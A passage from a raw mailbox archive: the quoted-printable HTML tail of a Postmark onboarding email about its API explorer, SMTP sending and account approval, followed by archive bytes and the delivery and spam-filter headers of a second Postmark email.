style=3D"padding:0;Margin:0;padding-left:30px;padding-righ= t:30px;font-size:0px"><a target=3D"_blank" href=3D"https://postmark.lt.emln= k1.com/Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5j= b20lMkZhcGktZXhwbG9yZXIlM0ZhcGktdHlwZSUzRHNlcnZlciUyMyUyNnV0bV9zb3VyY2UlM0R= hY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY2FtcGFpZ24lM0RwbV8yMD= IzMDdfb25ib2FyZGluZy12MV9lMQ=3D=3D&sig=3D4t6uQXN2sCy92d5Vosq1kWbKFCyoySH5fg= kFJP7Uc9ZW&iat=3D1727097336&a=3D%7C%7C477586617%7C%7C&account=3Dpostmark%2E= activehosted%2Ecom&email=3DblV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9= S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=3D83f= 3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D51A85A3A253" style=3D"-webkit-text-size-a= djust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;text-deco= ration:underline;color:#0070CC;font-size:16px"><img class=3D"adapt-img" src= =3D"https://content.app-us1.com/cdn-cgi/image/dpr=3D2,fit=3Dscale-down,form= at=3Dauto,onerror=3Dredirect,width=3D650/MnbAp/2023/07/27/49270e42-1685-445= 9-8a45-c39dd90fd462.png" alt style=3D"display:block;border:0;outline:none;t= ext-decoration:none;-ms-interpolation-mode:bicubic" data-cf-ir-is-resized= =3D"true" width=3D"540"></a>=0A</td>=0A</tr>=0A<tr><td align=3D"center" hei= ght=3D"30" style=3D"padding:0;Margin:0"></td>=0A</tr>=0A<tr><td align=3D"le= ft" bgcolor=3D"#ffffff" style=3D"padding:0;Margin:0;padding-left:30px;paddi= ng-right:30px"><p style=3D"Margin:0;-webkit-text-size-adjust:none;-ms-text-= size-adjust:none;mso-line-height-rule:exactly;font-family:georgia, times, '= times new roman', serif;line-height:24px;color:#353942;font-size:16px">Quic= kly execute your first API call to send an email from your web browser with= our nifty API explorer. The API Explorer shows you the request and respons= e format, so it=E2=80=99s a great resource for testing out any calls to Pos= tmark's APIs.</p>=0A</td>=0A</tr>=0A<tr><td align=3D"center" height=3D"20" = style=3D"padding:0;Margin:0"></td>=0A</tr>=0A=0A <tr><td align=3D"left" sty= le=3D"padding:0;Margin:0;padding-left:30px"> =0A<!--[if mso]><a href=3D"htt= ps://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElMkY= lMkZwb3N0bWFya2FwcC5jb20lMkZhcGktZXhwbG9yZXIlM0ZhcGktdHlwZSUzRHNlcnZlciUyMy= UyNnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY= 2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMQ=3D=3D&sig=3D4t6uQXN2sCy92= d5Vosq1kWbKFCyoySH5fgkFJP7Uc9ZW&iat=3D1727097336&a=3D%7C%7C477586617%7C%7C&= account=3Dpostmark%2Eactivehosted%2Ecom&email=3DblV4Pb2BV9RS9H3d1woQhDHtcGC= wnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIl= e7T%2F7l3et60&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D51A85A3A253" target= =3D"_blank" hidden>=0A=09<v:roundrect xmlns:v=3D"urn:schemas-microsoft-com:= vml" xmlns:w=3D"urn:schemas-microsoft-com:office:word" esdevVmlButton href= =3D"https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=3DaHR0cHMl= M0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZhcGktZXhwbG9yZXIlM0ZhcGktdHlwZSUzRHNlcnZ= lciUyMyUyNnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMj= Z1dG1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMQ=3D=3D&sig=3D4t6uQX= N2sCy92d5Vosq1kWbKFCyoySH5fgkFJP7Uc9ZW&iat=3D1727097336&a=3D%7C%7C477586617= %7C%7C&account=3Dpostmark%2Eactivehosted%2Ecom&email=3DblV4Pb2BV9RS9H3d1woQ= hDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2= B3IDUIle7T%2F7l3et60&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D51A85A3A253" = =0A style=3D"height:36px; v-text-anchor:middle; width:174px"= arcsize=3D"8%" stroke=3D"f" fillcolor=3D"#007dcc">=0A=09=09<w:anchorlock>= </w:anchorlock>=0A=09=09<center style=3D'color:#ffffff; font-family:georgia= , times, "times new roman", serif; font-size:12px; font-weight:400; line-he= ight:12px; mso-text-raise:1px'>Try the API explorer →</center>=0A=09<= /v:roundrect></a>=0A<![endif]--> =0A<!--[if !mso]><!-- --><span class=3D"ms= ohide es-button-border" style=3D"border-style:solid;border-color:#007DCC;ba= ckground:#007DCC;border-width:0px;display:inline-block;border-radius:3px;wi= dth:auto;mso-hide:all"><a href=3D"https://postmark.lt.emlnk1.com/Prod/link-= tracker?redirectUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZhcGktZXhwb= G9yZXIlM0ZhcGktdHlwZSUzRHNlcnZlciUyMyUyNnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQl= MjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGl= uZy12MV9lMQ=3D=3D&sig=3D4t6uQXN2sCy92d5Vosq1kWbKFCyoySH5fgkFJP7Uc9ZW&iat=3D= 1727097336&a=3D%7C%7C477586617%7C%7C&account=3Dpostmark%2Eactivehosted%2Eco= m&email=3DblV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5O= nkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=3D83f3d2f8c2e1fe9a4fb8= 8e34e59f8c08&i=3D51A85A3A253" class=3D"es-button" target=3D"_blank" style= =3D"mso-style-priority:100 !important;text-decoration:none;-webkit-text-siz= e-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;color:= #FFFFFF;font-size:14px;padding:10px 15px 10px 15px;display:inline-block;bac= kground:#007DCC;border-radius:3px;font-family:georgia, times, 'times new ro= man',=0Aserif;font-weight:normal;font-style:normal;line-height:17px;width:a= uto;text-align:center;mso-padding-alt:0;mso-border-alt:10px solid #007DCC">= Try the API explorer =E2=86=92</a>=0A</span> =0A<!--<![endif]--></td>=0A</t= r>=0A<tr><td align=3D"center" height=3D"30" style=3D"padding:0;Margin:0"></= td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table= >=0A</td>=0A</tr>=0A</table>=0A=0A <table cellpadding=3D"0" cellspacing=3D"= 0" class=3D"es-content" align=3D"center" role=3D"none" style=3D"mso-table-l= space:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px;= table-layout:fixed !important;width:100%"><tr><td align=3D"center" style=3D= "padding:0;Margin:0"><table class=3D"es-content-body" align=3D"center" cell= padding=3D"0" cellspacing=3D"0" bgcolor=3D"#ffffff" role=3D"none" style=3D"= mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-s= pacing:0px;background-color:#FFFFFF;width:600px"><tr><td align=3D"left" sty= le=3D"Margin:0;padding-top:15px;padding-bottom:15px;padding-left:20px;paddi= ng-right:20px"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" ro= le=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-colla= pse:collapse;border-spacing:0px"><tr><td align=3D"center" valign=3D"top" st= yle=3D"padding:0;Margin:0;width:560px"><table cellpadding=3D"0" cellspacing= =3D"0" width=3D"100%" role=3D"presentation"=0Astyle=3D"mso-table-lspace:0pt= ;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px"><tr clas= s=3D"es-mobile-hidden"><td align=3D"center" style=3D"padding:0;Margin:0;fon= t-size:0px"><img class=3D"adapt-img" src=3D"https://content.app-us1.com/cdn= -cgi/image/dpr=3D2,fit=3Dscale-down,format=3Dauto,onerror=3Dredirect,width= =3D650/MnbAp/2022/08/30/ecf34620-59a9-4410-9304-be2efec15d16.png" alt style= =3D"display:block;border:0;outline:none;text-decoration:none;-ms-interpolat= ion-mode:bicubic" width=3D"500" data-cf-ir-is-resized=3D"true"></td>=0A=0A = </tr>=0A=0A<!--[if !mso]><!-- --><tr class=3D"es-desk-hidden" style=3D"disp= lay:none;float:left;overflow:hidden;width:0;max-height:0;line-height:0;mso-= hide:all"><td align=3D"center" style=3D"padding:0;Margin:0;font-size:0px"><= img class=3D"adapt-img" src=3D"https://content.app-us1.com/cdn-cgi/image/dp= r=3D2,fit=3Dscale-down,format=3Dauto,onerror=3Dredirect,width=3D650/MnbAp/2= 023/07/27/fbcc520e-92fb-4a8c-933a-4580ce19a5cf.png" alt style=3D"display:bl= ock;border:0;outline:none;text-decoration:none;-ms-interpolation-mode:bicub= ic" data-cf-ir-is-resized=3D"true" width=3D"260"></td>=0A=0A </tr>=0A =0A<!= --<![endif]--></table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A<tr><td= align=3D"left" style=3D"padding:0;Margin:0"><table cellpadding=3D"0" cells= pacing=3D"0" width=3D"100%" role=3D"none" style=3D"mso-table-lspace:0pt;mso= -table-rspace:0pt;border-collapse:collapse;border-spacing:0px"><tr><td alig= n=3D"center" valign=3D"top" style=3D"padding:0;Margin:0;width:600px"><table= cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" role=3D"presentation" s= tyle=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;= border-spacing:0px"><tr><td align=3D"center" height=3D"15" style=3D"padding= :0;Margin:0"></td>=0A</tr>=0A<tr><td align=3D"center" height=3D"11" style= =3D"padding:0;Margin:0"></td>=0A</tr>=0A=0A <tr><td align=3D"left" bgcolor= =3D"#ffffff" style=3D"padding:0;Margin:0;padding-left:30px;padding-right:30= px"><p style=3D"Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust= :none;mso-line-height-rule:exactly;font-family:georgia, times, 'times new r= oman', serif;line-height:24px;color:#353942;font-size:16px"><strong>I don= =E2=80=99t need an API. How do I send via SMTP?</strong></p>=0A=0A<p style= =3D"Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-li= ne-height-rule:exactly;font-family:georgia, times, 'times new roman', serif= ;line-height:24px;color:#353942;font-size:16px">We=E2=80=99ve got you cover= ed too, friend! <a href=3D"https://postmark.lt.emlnk1.com/Prod/link-tracker= ?redirectUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZkZXZlbG9wZXIlMkZ1= c2VyLWd1aWRlJTJGc2VuZC1lbWFpbC13aXRoLXNtdHAlM0Z1dG1fc291cmNlJTNEYWN0aXZlaG9= zdGVkJTI2dXRtX21lZGl1bSUzRGVtYWlsJTI2dXRtX2NhbXBhaWduJTNEcG1fMjAyMzA3X29uYm= 9hcmRpbmctdjFfZTE=3D&sig=3D6raYLPevDkK69g3yqfKwwt2FDn5e1sjK8yN2kM2hX2az&iat= =3D1727097336&a=3D%7C%7C477586617%7C%7C&account=3Dpostmark%2Eactivehosted%2= Ecom&email=3DblV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vx= g5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=3D83f3d2f8c2e1fe9a4= fb88e34e59f8c08&i=3D51A85A3A254" target=3D"_blank" style=3D"-webkit-text-si= ze-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;text-= decoration:underline;color:#0070CC;font-size:16px">Learn how to get started= with Postmark=E2=80=99s SMTP service.</a><br><br></p>=0A<p style=3D"Margin= :0;-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-= rule:exactly;font-family:georgia, times, 'times new roman', serif;line-heig= ht:24px;color:#353942;font-size:16px"><strong>Why can I only send test emai= ls to domains I verified?</strong></p>=0A=0A<p style=3D"Margin:0;-webkit-te= xt-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;= font-family:georgia, times, 'times new roman', serif;line-height:24px;color= :#353942;font-size:16px">This means your account is currently in test mode.= That allows you to get familiar with Postmark, and send up to 100 emails t= o domains that you=E2=80=99ve verified. Once you=E2=80=99re ready to send e= mails to others, we=E2=80=99ll need to approve your account. Why? Reviewing= each account helps us tell the responsible senders (that=E2=80=99s you!) a= part from the spammers (boo!), so we can maintain our stellar deliverabilit= y rates for all customers. So whenever you=E2=80=99re ready, <a=0Ahref=3D"h= ttps://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElM= kYlMkZhY2NvdW50LnBvc3RtYXJrYXBwLmNvbSUyRmFjY291bnRfYXBwcm92YWwlMkZhcHBseSUz= RnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY2F= tcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMQ=3D=3D&sig=3D49NM9JG65bV6J51= RhvL6cSZmv77PwzYiPgsTGaLRBcZx&iat=3D1727097336&a=3D%7C%7C477586617%7C%7C&ac= count=3Dpostmark%2Eactivehosted%2Ecom&email=3DblV4Pb2BV9RS9H3d1woQhDHtcGCwn= Hv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7= T%2F7l3et60&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D51A85A3A255" target=3D= "_blank" style=3D"-webkit-text-size-adjust:none;-ms-text-size-adjust:none;m= so-line-height-rule:exactly;text-decoration:underline;color:#0070CC;font-si= ze:16px">submit an approval request</a>.</p>=0A=0A<p style=3D"Margin:0;-web= kit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:ex= actly;font-family:georgia, times, 'times new roman', serif;line-height:24px= ;color:#353942;font-size:16px"><br></p>=0A<p style=3D"Margin:0;-webkit-text= -size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;fo= nt-family:georgia, times, 'times new roman', serif;line-height:24px;color:#= 353942;font-size:16px">Do you have any questions? Just reply to this email.= We=E2=80=99re here to help.</p>=0A</td>=0A</tr>=0A<tr><td align=3D"center"= height=3D"30" style=3D"padding:0;Margin:0"></td>=0A</tr>=0A</table>=0A</td= >=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>= =0A=0A <table cellpadding=3D"0" cellspacing=3D"0" class=3D"es-content" alig= n=3D"center" role=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0= pt;border-collapse:collapse;border-spacing:0px;table-layout:fixed !importan= t;width:100%"><tr><td align=3D"center" style=3D"padding:0;Margin:0"><table = class=3D"es-content-body" align=3D"center" cellpadding=3D"0" cellspacing=3D= "0" bgcolor=3D"#ffffff" role=3D"none" style=3D"mso-table-lspace:0pt;mso-tab= le-rspace:0pt;border-collapse:collapse;border-spacing:0px;background-color:= #FFFFFF;width:600px"><tr><td align=3D"left" style=3D"padding:0;Margin:0"><t= able cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" role=3D"none" style= =3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;bord= er-spacing:0px"><tr><td align=3D"center" valign=3D"top" style=3D"padding:0;= Margin:0;width:600px"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"1= 00%" role=3D"presentation" style=3D"mso-table-lspace:0pt;mso-table-rspace:0= pt;border-collapse:collapse;border-spacing:0px"><tr><td align=3D"center"=0A= height=3D"20" style=3D"padding:0;Margin:0"></td>=0A=0A </tr>=0A</table>=0A<= /td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</tabl= e>=0A=0A <table cellpadding=3D"0" cellspacing=3D"0" class=3D"es-content" al= ign=3D"center" role=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace= :0pt;border-collapse:collapse;border-spacing:0px;table-layout:fixed !import= ant;width:100%"><tr><td align=3D"center" style=3D"padding:0;Margin:0"><tabl= e bgcolor=3D"#ffffff" class=3D"es-content-body" align=3D"center" cellpaddin= g=3D"0" cellspacing=3D"0" role=3D"none" style=3D"mso-table-lspace:0pt;mso-t= able-rspace:0pt;border-collapse:collapse;border-spacing:0px;background-colo= r:#FFFFFF;width:600px"><tr><td align=3D"left" bgcolor=3D"#ffde00" style=3D"= padding:0;Margin:0;padding-left:30px;padding-right:30px;background-color:#f= fde00"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" role=3D"no= ne" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:coll= apse;border-spacing:0px"><tr><td align=3D"center" valign=3D"top" style=3D"p= adding:0;Margin:0;width:540px"><table cellpadding=3D"0" cellspacing=3D"0" w= idth=3D"100%" bgcolor=3D"#ffde00"=0Astyle=3D"mso-table-lspace:0pt;mso-table= -rspace:0pt;border-collapse:collapse;border-spacing:0px;background-color:#f= fde00" role=3D"presentation"><tr><td align=3D"center" style=3D"padding:0;Ma= rgin:0;padding-top:15px;padding-bottom:15px"><p style=3D"Margin:0;-webkit-t= ext-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly= ;font-family:georgia, times, 'times new roman', serif;line-height:24px;colo= r:#353942;font-size:16px"><strong>Was this email helpful?=C2=A0</strong><br= >=C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0=C2=A0=C2=A0 =C2=A0 =C2=A0 =C2=A0㈺= 1;=C2=A0<a target=3D"_blank" href=3D"https://postmark.lt.emlnk1.com/Prod/li= nk-tracker?redirectUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZ0aGFuay= 15b3UtZm9yLXZvdGluZyUzRnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJ= TNEZW1haWwlMjZ1dG1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMSUyNnV0= bV9jb250ZW50JTNEbm8=3D&sig=3D5T4rtkzizjiSuYhYJamf9n7hE2gbob4aVwniRuApMQxb&i= at=3D1727097336&a=3D%7C%7C477586617%7C%7C&account=3Dpostmark%2Eactivehosted= %2Ecom&email=3DblV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8= Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=3D83f3d2f8c2e1fe9= a4fb88e34e59f8c08&i=3D51A85A3A209"=0Astyle=3D"-webkit-text-size-adjust:none= ;-ms-text-size-adjust:none;mso-line-height-rule:exactly;text-decoration:und= erline;color:#333333;font-size:16px">Nope</a>=C2=A0 =C2=A0 =C2=A0 =C2=A0 = =E2=9D=A4=EF=B8=8F=C2=A0<a target=3D"_blank" href=3D"https://postmark.lt.em= lnk1.com/Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC= 5jb20lMkZ0aGFuay15b3UtZm9yLXZvdGluZyUzRnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlM= jZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGlu= Zy12MV9lMSUyNnV0bV9jb250ZW50JTNEeWVz&sig=3DAqMRjjJmABGE5DYwqNFRaGT3CPapJKqN= z6LcbVGrDsrr&iat=3D1727097336&a=3D%7C%7C477586617%7C%7C&account=3Dpostmark%= 2Eactivehosted%2Ecom&email=3DblV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbc= X9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=3D8= 3f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D51A85A3A210" style=3D"-webkit-text-size= -adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;text-de= coration:underline;color:#333333;font-size:16px">Yes</a>=C2=A0 =C2=A0 = =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0</p>=0A=0A</td>=0A</tr>=0A<= /table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</t= r>=0A</table>=0A=0A <table cellpadding=3D"0" cellspacing=3D"0" class=3D"es-= footer" align=3D"center" role=3D"none" style=3D"mso-table-lspace:0pt;mso-ta= ble-rspace:0pt;border-collapse:collapse;border-spacing:0px;table-layout:fix= ed !important;width:100%;background-color:transparent;background-repeat:rep= eat;background-position:center top"><tr><td align=3D"center" style=3D"paddi= ng:0;Margin:0"><table class=3D"es-footer-body" align=3D"center" cellpadding= =3D"0" cellspacing=3D"0" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt= ;border-collapse:collapse;border-spacing:0px;background-color:transparent;w= idth:600px" bgcolor=3D"#FFFFFF" role=3D"none"><tr><td align=3D"left" style= =3D"padding:0;Margin:0;padding-left:30px;padding-right:30px"><table cellpad= ding=3D"0" cellspacing=3D"0" width=3D"100%" role=3D"none" style=3D"mso-tabl= e-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0= px"><tr><td align=3D"center" valign=3D"top" style=3D"padding:0;Margin:0;wid= th:540px"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"100%"=0Arole= =3D"presentation" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border= -collapse:collapse;border-spacing:0px"><tr><td align=3D"center" height=3D"2= 0" bgcolor=3D"#f5f3ec" style=3D"padding:0;Margin:0"></td>=0A=0A </tr>=0A<tr= ><td align=3D"center" style=3D"padding:0;Margin:0"><p style=3D"Margin:0;-we= bkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:e= xactly;font-family:georgia, times, 'times new roman', serif;line-height:18p= x;color:#a9a696;font-size:12px">Postmark, 1 North Dearborn St, 5th floor, C= hicago, IL 60602, United States<br><a href=3D"https://postmark.lt.emlnk1.co= m/Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0bWFyay5hY3RpdmVob= 3N0ZWQuY29tJTJGcF92LnBocCUzRmwlM0QzJTI2YyUzRDUxJTI2bSUzRDg1JTI2cyUzRDgzZjNk= MmY4YzJlMWZlOWE0ZmI4OGUzNGU1OWY4YzA4&sig=3DFRM1YbwJQb3ZzZihcZKkvfJZBLcSwS2t= QUxJPE2WhQ7&iat=3D1727097336&a=3D%7C%7C477586617%7C%7C&account=3Dpostmark%2= Eactivehosted%2Ecom&email=3DblV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX= 9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=3D83= f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D51A85A3A200" target=3D"_blank" style=3D"= -webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rul= e:exactly;text-decoration:underline;color:#a9a696;font-size:12px">Read this= online</a>=C2=A0=E2=80=93=C2=A0<a href=3D"https://postmark.activehosted.co= m/proc.php?nl=3D3&c=3D51&m=3D85&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&act=3D= unsub&runid=3D606393" target=3D"_blank"=0Astyle=3D"-webkit-text-size-adjust= :none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;text-decoratio= n:underline;color:#a9a696;font-size:12px">Unsubscribe</a></p>=0A</td>=0A</t= r>=0A<tr><td align=3D"center" height=3D"20" bgcolor=3D"#f5f3ec" style=3D"pa= dding:0;Margin:0"></td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</t= d>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A=0A </table>=0A</td>=0A</tr>=0A</ta= ble>=0A<img src=3D"https://postmark.lt.emlnk1.com/Prod/link-tracker?nl=3D3&= c=3D51&m=3D85&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&l=3Dopen&account=3Dpostm= ark.activehosted.com&a=3D477586617" border=3D"0" width=3D"1" height=3D"1" s= tyle=3D"display:block;width:1px!important;min-width:1px!important;max-width= :1px!important;height:1px!important;border:0;overflow:hidden;" /><br /><br = clear=3D"all" /></body>=0A</html> --_=_swift-160317694066f169f89b96a4.53478661_=_-- PK }��YhW�s� s� C 1727529370.M799456P3062090.mgh-web11.maghost.ro,S=42099,W=42626:2,Snu ��٘� Return-Path: <bounce-2696927-57-467499-rudolph.perry=bloomingcostamices.com@ac-bounces.fyi.postmarkapp.com> Delivered-To: rudolph.perry@bloomingcostamices.com Received: from mgh-web11.maghost.ro by mgh-web11.maghost.ro with LMTP id iHJoLpoB+GZKuS4AJwI5NA (envelope-from <bounce-2696927-57-467499-rudolph.perry=bloomingcostamices.com@ac-bounces.fyi.postmarkapp.com>) for <rudolph.perry@bloomingcostamices.com>; Sat, 28 Sep 2024 16:16:10 +0300 Return-path: <bounce-2696927-57-467499-rudolph.perry=bloomingcostamices.com@ac-bounces.fyi.postmarkapp.com> Envelope-to: rudolph.perry@bloomingcostamices.com Delivery-date: Sat, 28 Sep 2024 16:16:10 +0300 Received: from d82.asa.acemsd2.com ([52.128.41.226]:54656) by mgh-web11.maghost.ro with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.97.1) (envelope-from <bounce-2696927-57-467499-rudolph.perry=bloomingcostamices.com@ac-bounces.fyi.postmarkapp.com>) id 1suXIw-0000000CqnL-1IRV for rudolph.perry@bloomingcostamices.com; Sat, 28 Sep 2024 16:16:10 +0300 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=acdkim1; d=fyi.postmarkapp.com; h=To:From:Subject:Date:MIME-Version:Content-Type:Content-Transfer-Encoding: Feedback-ID:List-Unsubscribe:List-Unsubscribe-Post:Message-ID; i=hello@fyi.postmarkapp.com; bh=0Mm2wJGFo7+n3koUI7aQCa8S4R2mKRHHe/ahmnuw7FE=; b=qxFyHDMEYeF4zHgyWruJdoCosiScFH2bfW7IsiTKCcW5uEcPqpOy/BdVM5tBEbeoqSJ+mHgLONZa YUjjOFj1Vhxo7yVRSOlFpfJ3QV4CdAjaU44J1tEtK7VxtVHXVmycyQWznKCH8eQV0d6OdxeKq704 Ddi5ZfAqojAiJHEbGPpDiiv1aOg+G0NtX0fGB8s8eWhNWuajp6CeoFHMVngjahuSsOcrPfauY6o2 JkzNAZwFFlcpvy6kC3tX2h1k1nrT9LTnU6aQkWil7uc1h8ps/UBRhoWYdn2KqusNjYDNVhnPP3k1 3xcs5r3TD3K+hg8Ffj9VTK+D0/srBJliAsUCuw== Received: by d82.asa.acemsd2.com id hv00ms36bm4o for <rudolph.perry@bloomingcostamices.com>; Sat, 28 Sep 2024 13:15:26 +0000 (envelope-from <bounce-2696927-57-467499-rudolph.perry=bloomingcostamices.com@ac-bounces.fyi.postmarkapp.com>) X-Mailer: ActiveCampaign Mailer CFBL-Address: fbl-report@acems1.com; report=arf To: rudolph.perry@bloomingcostamices.com From: "Postmark" <hello@fyi.postmarkapp.com> Subject: Get your Postmark account approved Date: Sat, 28 Sep 2024 08:15:25 -0500 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="_=_swift-125849113966f8016dc6a6b3.80717975_=_" Content-Transfer-Encoding: 7bit X-Report-Abuse: Please report abuse here: abuse@acemserv.com X-mid: cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nvc3RhbWljZXMuY29tICwgYzU3ICwgbTkwICwgczMxMzA x-virtual-mta: d82.asa.acemsd2.com Feedback-ID: 2696927:2696927.57:d82.asa.acemsd2.com:activecampaign X-250ok-CID: 2696927-57 List-Unsubscribe: <https://postmark.activehosted.com/box.php?nl=3&c=57&m=90&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&funcml=unsub2&luha=1>,<mailto:unsubscribe-d4187fdf6cd8226b437d427b69435271-57-83f3d2f8c2e1fe9a4fb88e34e59f8c08@out.activecampaign.com> List-Unsubscribe-Post: List-Unsubscribe=One-Click X-DKIM-Options: s=acdkim1 Message-ID: <0.0.5F.D03.1DB11A87B7894C2.0@d82.asa.acemsd2.com> X-Spam-Status: No, score=1.8 X-Spam-Score: 18 X-Spam-Bar: + X-Ham-Report: Spam detection software, running on the system "mgh-web11.maghost.ro", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: ... and start sending emails to others. It will only take a minute. [...] Content analysis details: (1.8 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 1.9 URIBL_ABUSE_SURBL Contains an URL listed in the ABUSE SURBL blocklist [URI: content.app-us1.com] -0.0 SPF_PASS SPF: sender matches SPF record -0.0 